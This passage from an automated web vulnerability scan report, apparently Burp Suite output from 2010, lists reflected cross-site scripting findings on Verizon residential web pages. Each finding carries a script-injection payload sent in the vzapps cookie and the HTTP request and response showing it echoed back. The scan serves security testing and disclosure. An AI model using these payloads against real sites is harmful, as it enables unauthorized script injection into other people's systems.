Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX8aa13'><script>alert(1)</script>b18f6a6e3d9; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73700
Expires: Sat, 20 Nov 2010 02:35:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:35:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8aa13'><script>alert(1)</script>b18f6a6e3d9; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Entertainment on Demand: Games
</title><meta name="keywords" content="games, world of warcraft, internet games, online games, action game
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8AA13'><SCRIPT>ALERT(1)</SCRIPT>B18F6A6E3D9 ' />
...[SNIP]...

1.56. http://www22.verizon.com/Residential/EntertainmentOnDemand/Movies/Movies.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/EntertainmentOnDemand/Movies/Movies.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8bdd5'><script>alert(1)</script>0e84856a01a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/EntertainmentOnDemand/Movies/Movies.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX8bdd5'><script>alert(1)</script>0e84856a01a; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 72415
Expires: Sat, 20 Nov 2010 02:34:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:34:48 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8bdd5'><script>alert(1)</script>0e84856a01a; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Entertainment on Demand: Movies
</title><meta name="keywords" content="video downloads, movie downloads, internet movie, internet televisi
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8BDD5'><SCRIPT>ALERT(1)</SCRIPT>0E84856A01A ' />
...[SNIP]...

1.57. http://www22.verizon.com/Residential/FiOSInternet/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 93a42<script>alert(1)</script>4c0478de7 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX93a42<script>alert(1)</script>4c0478de7; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119102
Expires: Sat, 20 Nov 2010 02:07:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:07:10 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:07:09 GMT; path=/
Set-Cookie: ContextInfo_State=TX93a42<script>alert(1)</script>4c0478de7; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:10 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:10 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:10 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX93A42<SCRIPT>ALERT(1)</SCRIPT>4C0478DE7 </DIV>
...[SNIP]...

1.58. http://www22.verizon.com/Residential/FiOSInternet/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25d53'><script>alert(1)</script>0c31bc76bf5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX25d53'><script>alert(1)</script>0c31bc76bf5; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119110
Expires: Sat, 20 Nov 2010 02:07:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:07:09 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:07:09 GMT; path=/
Set-Cookie: ContextInfo_State=TX25d53'><script>alert(1)</script>0c31bc76bf5; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:09 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:09 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:09 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX25D53'><SCRIPT>ALERT(1)</SCRIPT>0C31BC76BF5 ' />
...[SNIP]...

1.59. http://www22.verizon.com/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70b53'><script>alert(1)</script>2c11006907 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX70b53'><script>alert(1)</script>2c11006907; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70907
Expires: Sat, 20 Nov 2010 02:07:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:07:38 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:07:38 GMT; path=/
Set-Cookie: ContextInfo_State=TX70b53'><script>alert(1)</script>2c11006907; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:38 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:38 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:38 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX70B53'><SCRIPT>ALERT(1)</SCRIPT>2C11006907 ' />
...[SNIP]...

1.60. http://www22.verizon.com/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 2d80e<script>alert(1)</script>06fdf66588a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX2d80e<script>alert(1)</script>06fdf66588a; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70905
Expires: Sat, 20 Nov 2010 02:07:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:07:39 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:07:39 GMT; path=/
Set-Cookie: ContextInfo_State=TX2d80e<script>alert(1)</script>06fdf66588a; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:39 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:39 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:07:39 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX2D80E<SCRIPT>ALERT(1)</SCRIPT>06FDF66588A </DIV>
...[SNIP]...

1.61. http://www22.verizon.com/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 94a91'><script>alert(1)</script>f5e2bd370e9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX94a91'><script>alert(1)</script>f5e2bd370e9; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58778
Expires: Sat, 20 Nov 2010 02:06:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:06:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX94a91'><script>alert(1)</script>f5e2bd370e9; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | FiOS Internet | Check Availability
</title><meta name="keywords" content="fios internet check availability, fios availability, fios check
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX94A91'><SCRIPT>ALERT(1)</SCRIPT>F5E2BD370E9 ' />
...[SNIP]...

1.62. http://www22.verizon.com/Residential/FiOSInternet/Equipment/Equipment.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7f116'><script>alert(1)</script>d00b8d921b2 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX7f116'><script>alert(1)</script>d00b8d921b2; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69788
Expires: Sat, 20 Nov 2010 02:06:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:06:56 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:06:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX7f116'><script>alert(1)</script>d00b8d921b2; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:06:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:06:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:06:56 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX7F116'><SCRIPT>ALERT(1)</SCRIPT>D00B8D921B2 ' />
...[SNIP]...

1.63. http://www22.verizon.com/Residential/FiOSInternet/Equipment/Equipment.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 54438<script>alert(1)</script>f68ab918137 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX54438<script>alert(1)</script>f68ab918137; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
